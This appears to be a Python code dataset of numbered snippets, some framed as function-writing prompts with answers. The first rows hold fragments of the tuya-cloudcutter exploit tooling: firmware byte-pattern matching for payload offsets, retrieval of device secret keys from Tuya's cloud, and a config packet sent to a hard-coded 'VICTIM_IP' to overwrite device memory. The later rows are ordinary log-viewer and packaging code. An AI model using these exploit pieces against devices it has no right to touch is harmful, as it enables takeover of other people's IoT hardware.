# Padding offset of 20 is the only one available in this SDK, instead of the usual 4 for SSID.
process_generic("BK7231T", "SDK 2.3.0", "ssid", 20, "041e08d14d4b", 1, 0, "7b69201c9847", 1, 0)
return
# Newest versions of BK7231T, BS 40.00, SDK 2.3.2
if b'TUYA IOT SDK V:2.3.2 BS:40.00_PT:2.2_LAN:3.3_CAD:1.0.4_CD:1.0.0' in appcode:
# 04 1e 00 d1 0c e7 is the byte pattern for ssid payload (offset 8 bytes)
# 1 match should be found
# bb 68 20 1c 98 47 is the byte pattern for finish address
# 1 match should be found, 1st is correct
# Padding offset of 8 is the only one available in this SDK, instead of the usual 4 for SSID.
process_generic("BK7231T", "SDK 2.3.2", "ssid", 8, "041e00d10ce7", 1, 0, "bb68201c9847", 1, 0)
return
# BK7231N, BS 40.00, SDK 2.3.1, CAD 1.0.3
# 0.0.2 is also a variant of 2.3.1
if (b'TUYA IOT SDK V:2.3.1 BS:40.00_PT:2.2_LAN:3.3_CAD:1.0.3_CD:1.0.0' in appcode
or b'TUYA IOT SDK V:0.0.2 BS:40.00_PT:2.2_LAN:3.3_CAD:1.0.3_CD:1.0.0' in appcode
or b'TUYA IOT SDK V:2.3.1 BS:40.00_PT:2.2_LAN:3.4_CAD:1.0.3_CD:1.0.0' in appcode
or b'TUYA IOT SDK V:ffcgroup BS:40.00_PT:2.2_LAN:3.3_CAD:1.0.3_CD:1.0.0' in appcode):
# 05 1e 00 d1 15 e7 is the byte pattern for ssid payload
# 1 match should be found
# 43 68 20 1c 98 47 is the byte pattern for finish address
# 1 match should be found
process_generic("BK7231N", "SDK 2.3.1", "ssid", 4, "051e00d115e7", 1, 0, "4368201c9847", 1, 0)
return
# BK7231N, BS 40.00, SDK 2.3.3, CAD 1.0.4
if b'TUYA IOT SDK V:2.3.3 BS:40.00_PT:2.2_LAN:3.3_CAD:1.0.4_CD:1.0.0' in appcode:
# 05 1e 00 d1 13 e7 is the byte pattern for ssid payload
# 1 match should be found
# 43 68 20 1c 98 47 is the byte pattern for finish address
# 1 match should be found
process_generic("BK7231N", "SDK 2.3.3 LAN 3.3/CAD 1.0.4", "ssid", 4, "051e00d113e7", 1, 0, "4368201c9847", 1, 0)
return
# BK7231N, BS 40.00, SDK 2.3.3, CAD 1.0.5
if b'TUYA IOT SDK V:2.3.3 BS:40.00_PT:2.2_LAN:3.4_CAD:1.0.5_CD:1.0.0' in appcode:
# 05 1e 00 d1 fc e6 is the byte pattern for ssid payload
# 1 match should be found
# 43 68 20 1c 98 47 is the byte pattern for finish address
# 1 match should be found
process_generic("BK7231N", "SDK 2.3.3 LAN 3.4/CAD 1.0.5", "ssid", 4, "051e00d1fce6", 1, 0, "4368201c9847", 1, 0)
return
# TuyaOS V3+, patched
if b'TuyaOS V:3' in appcode:
print("[!] The binary supplied appears to be patched and no longer vulnerable to the tuya-cloudcutter exploit.")
sys.exit(5)
raise RuntimeError('Unknown pattern, please open a new issue and include the bin.')
def run(decrypted_app_file: str):
if not decrypted_app_file:
print('Usage: python haxomatic.py <app code file>')
sys.exit(1)
address_finish_file = decrypted_app_file.replace('_app_1.00_decrypted.bin', '_address_finish.txt')
if os.path.exists(address_finish_file):
print('[+] Haxomatic has already been run')
return
global appcode_path, appcode
appcode_path = decrypted_app_file
with open(appcode_path, 'rb') as fs:
appcode = fs.read()
walk_app_code() | null |
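process_generic itself is not included in this snippet. The sketch below only restates the pattern-scan idea the comments describe: decode the hex signature, collect every offset at which it occurs, then pick the expected occurrence:

def find_pattern_offsets(code: bytes, hex_pattern: str) -> list[int]:
    needle = bytes.fromhex(hex_pattern)
    offsets, start = [], 0
    while (start := code.find(needle, start)) != -1:
        offsets.append(start)
        start += 1
    return offsets
blob = b"\x00\x01\x2b\x68\x30\x1c\x98\x47\x00\x2b\x68\x30\x1c\x98\x47"
print(find_pattern_offsets(blob, "2b68301c9847"))  # [2, 9]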
188,518 | import json
import os
import socket
import struct
import sys
import threading
import time
from tuya_api_connection import TuyaAPIConnection
def print_help():
print('Usage: python pull_schema.py --input <uuid> <auth_key> <product_key or empty string ""> <firmware_key or empty string ""> <software_version> <baseline_version> <token>')
print(' or: python pull_schema.py --directory <directory> <token>')
sys.exit(1) | null |
188,519 | import json
import os
import socket
import struct
import sys
import threading
import time
from tuya_api_connection import TuyaAPIConnection
def run(directory: str, output_file_prefix: str, uuid: str, auth_key: str, product_key: str, firmware_key: str, software_version: str, baseline_version: str = '40.00', cad_version: str = '1.0.2', cd_version: str = '1.0.0', protocol_version='2.2', token: str = None):
def run_input(uuid, auth_key, product_key, firmware_key, software_version, baseline_version='40.00', cad_version='1.0.2', cd_version='1.0.0', protocol_version='2.2', token=None):
run('.\\', 'device', uuid, auth_key, product_key, firmware_key, software_version, baseline_version, cad_version, cd_version, protocol_version, token) | null |
188,520 | import json
import os
import socket
import struct
import sys
import threading
import time
from tuya_api_connection import TuyaAPIConnection
def read_single_line_file(path):
with open(path, 'r') as file:
fileContents = file.read()
if fileContents.__contains__('\n'):
return None
return fileContents
def run(directory: str, output_file_prefix: str, uuid: str, auth_key: str, product_key: str, firmware_key: str, software_version: str, baseline_version: str = '40.00', cad_version: str = '1.0.2', cd_version: str = '1.0.0', protocol_version='2.2', token: str = None):
if uuid is None or len(uuid) != 16:
if product_key is not None and len(product_key) == 16:
uuid = product_key
else:
print_and_exit('required uuid was not found or was invalid (expected 16 characters)')
if auth_key is None or len(auth_key) != 32:
print_and_exit('required auth_key was not found or was invalid (expected 32 characters)')
if (product_key is None or len(product_key) == 0) and (firmware_key is None or len(firmware_key) == 0):
print_and_exit('required product_key or firmware_key was not found or was invalid (expected 16 characters)')
if software_version is None or len(software_version) < 5:
print_and_exit('required softVer was not found or was invalid (expected >= 5 characters)')
if cad_version is None or len(cad_version) < 5:
print_and_exit('required cadVer was not found or was invalid (expected >= 5 characters)')
if baseline_version is None or len(baseline_version) < 5:
print_and_exit('required baselineVer was not found or was invalid (expected 5 characters)')
if token is None or len(token) != 14:
token = get_new_token()
if token is None:
print_and_exit('[!] Error receiving new token.')
region = token[:2]
# Region information found at: https://airtake-public-data.oss-cn-hangzhou.aliyuncs.com/goat/pdf/1582271993811/Tuya%20Smart%20Cloud%20Platform%20Overview_Tuya%20Smart_Docs.pdf
# AZ American west AWS Oregon Main Machine Room
# UEAZ American east AZURE Virginia Machine Room
if region == "AZ" or region == "UE":
region = "us"
# EU Europe AWS Frankfurt Machine Room
elif region == "EU":
region = "eu"
# AY Asia Tencent ShangHai Core Machine Room
elif region == "AY":
region = "cn"
# IN Indian AWS Mumbai Machine Room
elif region == "IN":
region = "in"
else:
print(f"[!] Unable to determine region from token provided (prefix {region})")
sys.exit(4)
reduced_token = token[2:]
reduced_token = reduced_token[:8]
assert len(reduced_token) == 8
print(f'Using token: {token} product_key: {product_key} firmware_key: {firmware_key}')
# tuya.device.active encrypts with auth_key
connection = TuyaAPIConnection(uuid, auth_key)
url = f"http://a.tuya{region}.com/d.json"
epoch_time = int(time.time())
params = build_params(epoch_time, uuid)
response = None
requestType = "POST"
responseCodesToContinueAter = ['FIRMWARE_NOT_MATCH', 'APP_PRODUCT_UNSUPPORT', 'NOT_EXISTS']
if product_key is not None:
data = build_data(epoch_time, reduced_token, product_key, software_version, baseline_version, cad_version, cd_version, protocol_version, False)
response = connection.request(url, params, data, requestType)
if response["success"] == False and response["errorCode"] in responseCodesToContinueAter:
data = build_data(epoch_time, reduced_token, product_key, software_version, baseline_version, cad_version, cd_version, protocol_version, True)
response = connection.request(url, params, data, requestType)
if product_key != firmware_key:
if (response is None or (response is not None and response["success"] == False and response["errorCode"] != "EXPIRE")) and firmware_key is not None:
data = build_data(epoch_time, reduced_token, firmware_key, software_version, baseline_version, cad_version, cd_version, protocol_version, True)
response = connection.request(url, params, data, requestType)
if response["success"] == False and response["errorCode"] in responseCodesToContinueAter:
data = build_data(epoch_time, reduced_token, firmware_key, software_version, baseline_version, cad_version, cd_version, protocol_version, False)
response = connection.request(url, params, data, requestType)
if response["success"] == True:
print(f"[+] Schema Id: {response['result']['schemaId']}")
print(f"[+] Schema: {response['result']['schema']}")
with open(os.path.join(directory, output_file_prefix + "_schema_id.txt"), 'w') as f:
f.write(response['result']['schemaId'])
with open(os.path.join(directory, output_file_prefix + "_schema.txt"), 'w') as f:
f.write(response['result']['schema'])
with open(os.path.join(directory, output_file_prefix + "_dev_id.txt"), 'w') as f:
f.write(response['result']['devId'])
with open(os.path.join(directory, output_file_prefix + "_sec_key.txt"), 'w') as f:
f.write(response['result']['secKey'])
elif response["success"] == False and response["errorCode"] == 'EXPIRE':
print("[!] The token provided has either expired, or you are connected to the wrong region")
else:
print(response)
def run_directory(directory, token=None):
uuid = None
auth_key = None
product_key = None
firmware_key = None
software_version = None
baseline_version = '40.00'
cad_version = '1.0.2'
cd_version = '1.0.0'
protocol_version = '2.2'
output_file_prefix = None
dirListing = os.listdir(f'{directory}')
for file in dirListing:
if file.endswith('_uuid.txt'):
uuid = read_single_line_file(os.path.join(directory, file))
elif file.endswith('_auth_key.txt'):
auth_key = read_single_line_file(os.path.join(directory, file))
elif file.endswith('_product_key.txt'):
product_key = read_single_line_file(os.path.join(directory, file))
elif file.endswith('_firmware_key.txt'):
firmware_key = read_single_line_file(os.path.join(directory, file))
elif file.endswith('_swv.txt'):
software_version = read_single_line_file(os.path.join(directory, file))
elif file.endswith('_bv.txt'):
baseline_version = read_single_line_file(os.path.join(directory, file))
elif file.endswith('_chip.txt'):
output_file_prefix = file.replace('_chip.txt', '')
if uuid is None:
print('[!] uuid was not found')
return
if auth_key is None:
print('[!] auth_key was not found')
return
if (product_key is None or product_key == '') and (firmware_key is None or firmware_key == ''):
print('[!] product_key or firmware_key was not found, at least one must be provided')
return
if software_version is None:
print('[!] software_version was not found')
return
if baseline_version is None:
print('[!] baseline_version was not found')
return
run(directory, output_file_prefix, uuid, auth_key, product_key, firmware_key, software_version, baseline_version, cad_version, cd_version, protocol_version, token) | null |
188,521 | import os.path
import sys
import extract
import generate_profile_classic
import haxomatic
import process_app
import process_storage
import pull_schema
def print_filename_instructions():
print('Encrypted bin name must be in the pattern of Manufacturer-Name_Model-and-device-description')
print('Use dashes in places of spaces, and if a dash (-) is present, replace it with 3 dashes (---)')
print('There should only be 1 underscore in the filename, separating manufacturer name and model description') | null |
188,522 | import struct
import zlib
import socket
MAX_CONFIG_PACKET_PAYLOAD_LEN = 0xE8
def build_network_config_packet(payload):
if len(payload) > MAX_CONFIG_PACKET_PAYLOAD_LEN:
raise ValueError('Payload is too long!')
# NOTE
# fr_num and crc do not seem to be used in the disas
# calculating them anyway - in case it's needed
# for some reason.
tail_len = 8
head, tail = 0x55aa, 0xaa55
fr_num, fr_type = 0, 0x1
plen = len(payload) + tail_len
buffer = struct.pack("!IIII", head, fr_num, fr_type, plen)
buffer += payload
crc = zlib.crc32(buffer)
buffer += struct.pack("!II", crc, tail)
return buffer | null |
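A quick sanity check of the packet layout, assuming build_network_config_packet from the snippet above is in scope; the JSON payload is made up for illustration:

import struct
import zlib
payload = b'{"ssid":"A","passwd":"B","token":"C"}'
packet = build_network_config_packet(payload)
# first 16 bytes are four big-endian u32 fields: head, fr_num, fr_type, length
head, fr_num, fr_type, plen = struct.unpack("!IIII", packet[:16])
assert (head, fr_num, fr_type) == (0x55AA, 0, 1)
assert plen == len(payload) + 8  # payload plus the 8-byte tail (crc + 0xAA55)
crc, tail = struct.unpack("!II", packet[-8:])
assert crc == zlib.crc32(packet[:-8]) and tail == 0xAA55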
188,523 | import struct
import zlib
import socket
VICTIM_IP = '192.168.175.1'
VICTIM_PORT = 6669
def send_network_config_datagram(datagram):
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.sendto(datagram, (VICTIM_IP, VICTIM_PORT)) | null |
188,524 | import struct
import zlib
import socket
def encode_json_val(value):
encoded = []
escaped = list(map(ord, '"\\'))
escape_char = ord('\\')
for i in value:
if i in escaped:
encoded.append(escape_char)
encoded.append(i)
return bytes(encoded) | null |
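encode_json_val iterates over byte values, so it expects bytes and returns bytes with quote and backslash characters escaped for embedding in a JSON string. A short example, assuming the function above is in scope:

raw = b'ssid"with\\chars'
print(encode_json_val(raw))  # b'ssid\\"with\\\\chars'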
188,525 | import struct
import zlib
import socket
def check_valid_payload(value):
eq_zero = lambda x: x == 0
if any(map(eq_zero, value)):
print('[!] At least one null byte detected in payload. Clobbering will stop before that.')
return value | null |
188,526 | from __future__ import annotations
import rich.repr
from abc import ABC, abstractmethod
from dataclasses import dataclass
import platform
from threading import Event, Lock, Thread
from typing import Callable, TYPE_CHECKING
class WatcherBase(ABC):
"""Watches files for changes."""
def __init__(self) -> None:
self._file_descriptors: dict[int, WatchedFile] = {}
self._thread: Thread | None = None
self._exit_event = Event()
super().__init__()
def scan_chunk(cls, chunk: bytes, position: int) -> list[int]:
"""Scan line breaks in a binary chunk,
Args:
chunk: A binary chunk.
position: Offset within the file
Returns:
A list of indices with new lines.
"""
breaks: list[int] = []
offset = 0
append = breaks.append
while (offset := chunk.find(b"\n", offset)) != -1:
append(position + offset)
offset += 1
return breaks
def close(self) -> None:
if not self._exit_event.is_set():
self._exit_event.set()
self._thread = None
def start(self) -> None:
assert self._thread is None
self._thread = Thread(target=self.run, name=repr(self))
self._thread.start()
def add(
self,
log_file: LogFile,
callback: Callable[[int, list[int]], None],
error_callback: Callable[[Exception], None],
) -> None:
"""Add a file to the watcher."""
fileno = log_file.fileno
self._file_descriptors[fileno] = WatchedFile(log_file, callback, error_callback)
def run(self) -> None:
"""Thread runner."""
class SelectorWatcher(WatcherBase):
"""Watches files for changes."""
def __init__(self) -> None:
self._selector = DefaultSelector()
super().__init__()
def close(self) -> None:
if not self._exit_event.is_set():
self._exit_event.set()
def add(
self,
log_file: LogFile,
callback: Callable[[int, list[int]], None],
error_callback: Callable[[Exception], None],
) -> None:
"""Add a file to the watcher."""
super().add(log_file, callback, error_callback)
fileno = log_file.fileno
size = log_file.size
os.lseek(fileno, size, os.SEEK_SET)
self._selector.register(fileno, EVENT_READ)
def run(self) -> None:
"""Thread runner."""
chunk_size = 64 * 1024
scan_chunk = self.scan_chunk
while not self._exit_event.is_set():
for key, mask in self._selector.select(timeout=0.1):
if self._exit_event.is_set():
break
if mask & EVENT_READ:
fileno = key.fileobj
assert isinstance(fileno, int)
watched_file = self._file_descriptors.get(fileno, None)
if watched_file is None:
continue
try:
position = os.lseek(fileno, 0, os.SEEK_CUR)
chunk = os.read(fileno, chunk_size)
if chunk:
breaks = scan_chunk(chunk, position)
watched_file.callback(position + len(chunk), breaks)
except Exception as error:
watched_file.error_callback(error)
self._file_descriptors.pop(fileno, None)
self._selector.unregister(fileno)
class PollWatcher(WatcherBase):
"""A watcher that simply polls."""
def run(self) -> None:
chunk_size = 64 * 1024
scan_chunk = self.scan_chunk
while not self._exit_event.is_set():
successful_read = False
for fileno, watched_file in self._file_descriptors.items():
try:
position = lseek(fileno, 0, SEEK_CUR)
if chunk := read(fileno, chunk_size):
successful_read = True
breaks = scan_chunk(chunk, position)
watched_file.callback(position + len(chunk), breaks)
position += len(chunk)
except Exception as error:
watched_file.error_callback(error)
self._file_descriptors.pop(fileno, None)
break
else:
if not successful_read:
time.sleep(0.05)
The provided code snippet includes necessary dependencies for implementing the `get_watcher` function. Write a Python function `def get_watcher() -> WatcherBase` to solve the following problem:
Return a Watcher appropriate for the OS.
Here is the function:
def get_watcher() -> WatcherBase:
"""Return an Watcher appropriate for the OS."""
if platform.system() == "Darwin":
from toolong.selector_watcher import SelectorWatcher
return SelectorWatcher()
else:
from toolong.poll_watcher import PollWatcher
return PollWatcher() | Return a Watcher appropriate for the OS.
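Both watcher implementations share the scan_chunk helper, which turns chunk-relative newline positions into absolute file offsets. A standalone restatement of that logic:

def scan_chunk(chunk: bytes, position: int) -> list[int]:
    breaks, offset = [], 0
    while (offset := chunk.find(b"\n", offset)) != -1:
        breaks.append(position + offset)
        offset += 1
    return breaks
print(scan_chunk(b"one\ntwo\nthree", position=100))  # [103, 107]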
188,527 | from rich.highlighter import RegexHighlighter
from rich.text import Text
The provided code snippet includes necessary dependencies for implementing the `_combine_regex` function. Write a Python function `def _combine_regex(*regexes: str) -> str` to solve the following problem:
Combine a number of regexes into a single regex. Returns: str: New regex with all regexes ORed together.
Here is the function:
def _combine_regex(*regexes: str) -> str:
"""Combine a number of regexes in to a single regex.
Returns:
str: New regex with all regexes ORed together.
"""
return "|".join(regexes) | Combine a number of regexes in to a single regex. Returns: str: New regex with all regexes ORed together. |
188,528 | from __future__ import annotations
from importlib.metadata import version
import os
import sys
import click
from toolong.ui import UI
class UI(App):
"""The top level App object."""
def sort_paths(cls, paths: list[str]) -> list[str]:
return sorted(paths, key=CompareTokens)
def __init__(
self, file_paths: list[str], merge: bool = False, save_merge: str | None = None
) -> None:
self.file_paths = self.sort_paths(file_paths)
self.merge = merge
self.save_merge = save_merge
self.watcher = get_watcher()
super().__init__()
async def on_mount(self) -> None:
await self.push_screen(LogScreen())
self.screen.query("LogLines").focus()
self.watcher.start()
def on_unmount(self) -> None:
self.watcher.close()
The provided code snippet includes necessary dependencies for implementing the `run` function. Write a Python function `def run(files: list[str], merge: bool, output_merge: str) -> None` to solve the following problem:
View / tail / search log files.
Here is the function:
def run(files: list[str], merge: bool, output_merge: str) -> None:
"""View / tail / search log files."""
stdin_tty = sys.__stdin__.isatty()
if not files and stdin_tty:
ctx = click.get_current_context()
click.echo(ctx.get_help())
ctx.exit()
if stdin_tty:
try:
ui = UI(files, merge=merge, save_merge=output_merge)
ui.run()
except Exception:
pass
else:
import signal
import selectors
import subprocess
import tempfile
def request_exit(*args) -> None:
"""Don't write anything when a signal forces an error."""
sys.stderr.write("^C")
signal.signal(signal.SIGINT, request_exit)
signal.signal(signal.SIGTERM, request_exit)
# Write piped data to a temporary file
with tempfile.NamedTemporaryFile(
mode="w+b", buffering=0, prefix="tl_"
) as temp_file:
# Get input directly from /dev/tty to free up stdin
with open("/dev/tty", "rb", buffering=0) as tty_stdin:
# Launch a new process to render the UI
with subprocess.Popen(
[sys.argv[0], temp_file.name],
stdin=tty_stdin,
close_fds=True,
env={**os.environ, "TEXTUAL_ALLOW_SIGNALS": "1"},
) as process:
# Current process copies from stdin to the temp file
selector = selectors.SelectSelector()
selector.register(sys.stdin.fileno(), selectors.EVENT_READ)
while process.poll() is None:
for _, event in selector.select(0.1):
if process.poll() is not None:
break
if event & selectors.EVENT_READ:
if line := os.read(sys.stdin.fileno(), 1024 * 64):
temp_file.write(line)
else:
break | View / tail / search log files. |
188,529 | import webbrowser
from importlib.metadata import version
from rich.text import Text
from textual import on
from textual.app import ComposeResult
from textual.containers import Center, VerticalScroll
from textual.screen import ModalScreen
from textual.widgets import Static, Markdown, Footer
TITLE = rf"""
_______ _
|__ __| | | Built with Textual
| | ___ ___ | | ___ _ __ __ _
| |/ _ \ / _ \| | / _ \| '_ \ / _` |
| | (_) | (_) | |___| (_) | | | | (_| |
|_|\___/ \___/|______\___/|_| |_|\__, |
__/ |
Moving at Terminal velocity |___/ v{version('toolong')}
"""
COLORS = [
"#881177",
"#aa3355",
"#cc6666",
"#ee9944",
"#eedd00",
"#99dd55",
"#44dd88",
"#22ccbb",
"#00bbcc",
"#0099cc",
"#3366bb",
"#663399",
]
The provided code snippet includes necessary dependencies for implementing the `get_title` function. Write a Python function `def get_title() -> Text` to solve the following problem:
Get the title, with a rainbow effect.
Here is the function:
def get_title() -> Text:
"""Get the title, with a rainbow effect."""
lines = TITLE.splitlines(keepends=True)
return Text.assemble(*zip(lines, COLORS)) | Get the title, with a rainbow effect. |
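Text.assemble accepts (text, style) pairs, so zipping the banner's lines with the colour list styles each line differently. A minimal sketch with made-up content, using the rich package imported above:

from rich.text import Text
lines = ["alpha\n", "beta\n", "gamma\n"]
colors = ["#881177", "#44dd88", "#0099cc"]
banner = Text.assemble(*zip(lines, colors))
print(banner.plain)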
188,530 | from __future__ import annotations
from datetime import datetime
import re
from typing import Callable, NamedTuple
def parse(line: str) -> tuple[TimestampFormat | None, datetime | None]:
"""Attempt to parse a timestamp."""
for timestamp in TIMESTAMP_FORMATS:
regex, parse_callable = timestamp
match = re.search(regex, line)
if match is not None:
try:
return timestamp, parse_callable(match.string)
except ValueError:
continue
return None, None
def parse_timestamp(format: str) -> Callable[[str], datetime | None]:
def parse(timestamp: str) -> datetime | None:
try:
return datetime.strptime(timestamp, format)
except ValueError:
return None
return parse | null |
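parse_timestamp builds a forgiving strptime wrapper that returns None instead of raising when a line does not match. A quick example, assuming the helper above is in scope:

parse_iso = parse_timestamp("%Y-%m-%d %H:%M:%S")
print(parse_iso("2024-01-02 03:04:05"))  # 2024-01-02 03:04:05
print(parse_iso("not a timestamp"))      # None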
188,531 | import os
from pkg_resources import parse_version
from setuptools import find_packages, setup
pwd = os.path.dirname(__file__)
def readme():
with open(os.path.join(pwd, 'README.md'), encoding='utf-8') as f:
content = f.read()
return content | null |
188,532 | import os
from pkg_resources import parse_version
from setuptools import find_packages, setup
pwd = os.path.dirname(__file__)
version_file = 'mmdeploy/version.py'
def get_version():
with open(os.path.join(pwd, version_file), 'r') as f:
exec(compile(f.read(), version_file, 'exec'))
return locals()['__version__'] | null |
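get_version relies on exec writing __version__ into the executing scope and reading it back out of locals(). A standalone illustration of the same trick with an inline, made-up version string (run at module scope for simplicity):

code = "__version__ = '0.1.0'"
exec(compile(code, "mmdeploy/version.py", "exec"))
print(locals()["__version__"])  # 0.1.0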